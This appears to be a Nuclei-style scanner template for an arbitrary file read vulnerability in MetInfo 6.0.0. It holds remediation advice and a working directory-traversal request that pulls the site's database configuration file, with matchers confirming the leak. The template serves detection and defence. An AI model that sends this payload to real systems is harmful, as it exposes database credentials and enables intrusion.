id: Metinfo-V6_0_0_old_thumb_class_php-FileRead
info:
  name: metinfo 6.0.0 old_thumb.class.php arbitrary file read vulnerability.
  author:
  - l0ne1y
  description: |-
    metinfo 6.0.0 old_thumb.class.php arbitrary file read vulnerability.
    MetInfo is a content management system developed with PHP and Mysql. The old_thumb.class.php file in MetInfo 6.0.0 has an arbitrary file read vulnerability. An attacker can exploit it to read sensitive files from the website.
  severity: high
  remediation: |-
    Remediation

    Official Fix:<br />1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site.
    https://www.metinfo.cn
    Temporary Fix:<br />1. Filter ".", preventing users from traversing to parent directories in the URL.<br />2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.<br />3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.<br />4. Store file paths in the database and let users download files by submitting the corresponding file ID.<br />5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"con_db_id") && contains(body,"con_db_name")
  matchers-condition: and
  path:
  - '{{BaseURL}}/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php'
  method: GET
